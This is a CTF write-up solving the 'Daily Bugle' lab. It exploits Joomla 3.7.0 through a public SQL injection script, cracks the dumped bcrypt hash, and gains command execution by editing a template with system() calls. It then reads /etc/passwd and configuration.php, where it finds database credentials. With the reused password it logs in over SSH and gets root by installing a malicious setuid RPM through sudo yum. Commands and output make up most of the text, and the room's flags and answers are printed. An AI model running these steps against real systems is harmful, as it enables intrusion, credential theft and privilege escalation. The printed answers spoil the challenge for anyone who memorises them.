Hi guys, today we look at CTF called Daily Bugle and we try to gain root priviledges. :) Let’s play.
NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read this post!
[Task 1]
First question is pretty simple. Open the article and you can find the answer
Access the web server, who robbed the bank?
- spiderman
[Task 2]
$ curl http://10.10.86.172/media/system/js/mootools-more.js 2>/dev/null | grep MooTools.More
MooTools.More={version:"1.4.0.1",build:"a4244edf2aa97ac8a196fc96082dd35af1abab87"};(function(){Events.Pseudos=function(h,e,f){var d="_monitorEvents:";var c=function(i){return{store:i.store?function(j,k){i.store(d+j,k);
$ curl http://10.10.86.172/language/en-GB/en-GB.xml
<?xml version="1.0" encoding="utf-8"?>
<metafile version="3.7" client="site">
<name>English (en-GB)</name>
<version>3.7.0</version>
<creationDate>April 2017</creationDate>
<author>Joomla! Project</author>
<authorEmail>[email protected]</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<copyright>Copyright (C) 2005 - 2017 Open Source Matters. All rights reserved.</copyright>
<license>GNU General Public License version 2 or later; see LICENSE.txt</license>
<description><![CDATA[en-GB site language]]></description>
<metadata>
<name>English (en-GB)</name>
<nativeName>English (United Kingdom)</nativeName>
<tag>en-GB</tag>
<rtl>0</rtl>
<locale>en_GB.utf8, en_GB.UTF-8, en_GB, eng_GB, en, english, english-uk, uk, gbr, britain, england, great britain, uk, united kingdom, united-kingdom</locale>
<firstDay>0</firstDay>
<weekEnd>0,6</weekEnd>
<calendar>gregorian</calendar>
</metadata>
<params />
</metafile>
We found it.
What is the Joomla version?
- 3.7.0
After some research of finding following exploits for SQL Injection in Joomla
I found the best way to solve this task and exploit the Joomla 3.7.0 SQLi vulnerability
$ git clone [email protected]:XiphosResearch/exploits.git
$ cd exploits/Joomblah
and finally run the exploit.
$ python2 joomblah.py http://10.10.86.172
.---. .-'''-. .-'''-.
| | ' _ \ ' _ \ .---.
'---' / /` '. \ / /` '. \ __ __ ___ /| | | .
.---.. | \ ' . | \ ' | |/ `.' `. || | | .'|
| || ' | '| ' | '| .-. .-. '|| | | < |
| |\ \ / / \ \ / / | | | | | ||| __ | | __ | |
| | `. ` ..' / `. ` ..' / | | | | | |||/'__ '. | | .:--.'. | | .'''-.
| | '-...-'` '-...-'` | | | | | ||:/` '. '| |/ | \ | | |/.'''. \
| | | | | | | ||| | || |`" __ | | | / | |
| | |__| |__| |__|||\ / '| | .'.''| | | | | |
__.' ' |/'..' / '---'/ / | |_| | | |
| ' ' `'-'` \ \._,\ '/| '. | '.
|____.' `--' `" '---' '---'
[-] Fetching CSRF token
[-] Testing SQLi
- Found table: fb9j5_users
- Extracting users from fb9j5_users
[$] Found user ['811', 'Super User', 'jonah', '[email protected]', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
- Extracting sessions from fb9j5_session
Now we need to crack the hashed password, so we save bcrypt hash to file hashes.txt and run.
c:\john-1.9.0-jumbo-1-win64\run>john.exe --wordlist=C:\Users\burso\Downloads\rockyou.txt --rules=wordlist --min-len=12 --max-len=12 ../hashes.txt
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spiderman123 (?)
1g 0:00:00:02 DONE (2020-02-07 10:54) 0.3846g/s 110.7p/s 110.7c/s 110.7C/s ilovepatrick..quetzalcoatl
Use the "--show" option to display all of the cracked passwords reliably
Session completed
What is Jonah’s cracked password?
- spiderman123
After logged in to the /administrator page with login jonah and password spiderman123 we need to gain access to ssh. go to page /administrator/index.php?option=com_templates&view=template&id=506&file=L2luZGV4LnBocA. We can edit index.php of template so we can run any command on server and execute them via Template Preview. Before run you don’t forget to save file.
system("id");
uid=48(apache) gid=48(apache) groups=48(apache)
Now we now any command executed via Joomla Template will run under apache user.
system("cat /etc/passwd");
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:999:998:User for polkitd:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:998:996::/var/lib/chrony:/sbin/nologin jjameson:x:1000:1000:Jonah Jameson:/home/jjameson:/bin/bash apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
We can see user jonah has jjameson username in ssh login, so we need password now.
system("cat configuration.php");
Please check back again soon.'; public $display_offline_message = '1'; public $offline_image = ''; public $sitename = 'The Daily Bugle'; public $editor = 'tinymce'; public $captcha = '0'; public $list_limit = '20'; public $access = '1'; public $debug = '0'; public $debug_lang = '0'; public $dbtype = 'mysqli'; public $host = 'localhost'; public $user = 'root'; public $password = 'nv5uz9r3ZEDzVjNu'; public $db = 'joomla'; public $dbprefix = 'fb9j5_'; public $live_site = ''; public $secret = 'UAMBRWzHO3oFPmVC'; public $gzip = '0'; public $error_reporting = 'default'; public $helpurl = 'https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}'; public $ftp_host = '127.0.0.1'; public $ftp_port = '21'; public $ftp_user = ''; public $ftp_pass = ''; public $ftp_root = ''; public $ftp_enable = '0'; public $offset = 'UTC'; public $mailonline = '1'; public $mailer = 'mail'; public $mailfrom = 'jonah@tryhackme.com'; public $fromname = 'The Daily Bugle'; public $sendmail = '/usr/sbin/sendmail'; public $smtpauth = '0'; public $smtpuser = ''; public $smtppass = ''; public $smtphost = 'localhost'; public $smtpsecure = 'none'; public $smtpport = '25'; public $caching = '0'; public $cache_handler = 'file'; public $cachetime = '15'; public $cache_platformprefix = '0'; public $MetaDesc = 'New York City tabloid newspaper'; public $MetaKeys = ''; public $MetaTitle = '1'; public $MetaAuthor = '1'; public $MetaVersion = '0'; public $robots = ''; public $sef = '1'; public $sef_rewrite = '0'; public $sef_suffix = '0'; public $unicodeslugs = '0'; public $feed_limit = '10'; public $feed_email = 'none'; public $log_path = '/var/www/html/administrator/logs'; public $tmp_path = '/var/www/html/tmp'; public $lifetime = '15'; public $session_handler = 'database'; public $shared_session = '0'; }
Interesting. We can try the password to database if it is not the same to jjameson ssh login.
- username: jjamesson
- password: nv5uz9r3ZEDzVjNu
$ ssh [email protected]
[email protected]'s password:
Last failed login: Fri Feb 7 10:07:52 EST 2020 from ip-10-8-11-158.eu-west-1.compute.internal on ssh:notty
There were 724 failed login attempts since the last successful login.
Last login: Mon Dec 16 05:14:55 2019 from netwars
Yes, everything works!
[jjameson@dailybugle ~]$ ls
user.txt
[jjameson@dailybugle ~]$ cat user.txt
27a260fe3cba712cfdedb1c86d80442e
What is the user flag?
- 27a260fe3cba712cfdedb1c86d80442e
The last step is gain root access on this machine. So let’s do it!
[jjameson@dailybugle ~]$ sudo -l
Matching Defaults entries for jjameson on dailybugle:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS
LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User jjameson may run the following commands on dailybugle:
(ALL) NOPASSWD: /usr/bin/yum
Yum is the only one command you can run under root and that’s security missconfiguration. More about the vulnerability you can find here. You can download the exploit here
So let’s download the exploit and copy to vulnerable server
$ wget https://gist.githubusercontent.com/neoice/797777cb0832f596a70b6cba7bbbcc4f/raw/f3f94e105c23d2c01706736d9cd729dd555e9c53/setuid-pop.rpm
$ scp setuid-pop.rpm [email protected]:~
Now extract the exploit and install it via yum
[jjameson@dailybugle ~]$ cat setuid-pop.rpm | base64 -d | gzip -d > yumsploit.rpm
[jjameson@dailybugle ~]$ sudo yum localinstall ~/yumsploit.rpm
Loaded plugins: fastestmirror
Examining /home/jjameson/yumsploit.rpm: sploit-1.0-1.x86_64
Marking /home/jjameson/yumsploit.rpm to be installed
Resolving Dependencies
--> Running transaction check
---> Package sploit.x86_64 0:1.0-1 will be installed
--> Finished Dependency Resolution
Dependencies Resolved
...
Downloading packages:
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Installing : sploit-1.0-1.x86_64 1/1
Verifying : sploit-1.0-1.x86_64 1/1
Installed:
sploit.x86_64 0:1.0-1
Complete!
We have installed pop binary in /usr/local/bin directory with setuid bit. That means pop binary will be runned with root priviledges.
meson@dailybugle ~]$ ls -la /usr/local/bin
total 12
drwxr-xr-x. 2 root root 17 Feb 7 10:43 .
drwxr-xr-x. 12 root root 131 Dec 14 13:57 ..
-rwsr-sr-x 1 root root 8744 Jan 18 2019 pop
Let’s execute it.
[jjameson@dailybugle ~]$ pop
[root@dailybugle ~]# id
uid=0(root) gid=0(root) groups=0(root),1000(jjameson)
[root@dailybugle ~]# cat /root/root.txt
eec3d53292b1821868266858d7fa6f79
Done! We have now root priviledges.
What is the root flag?
- eec3d53292b1821868266858d7fa6f79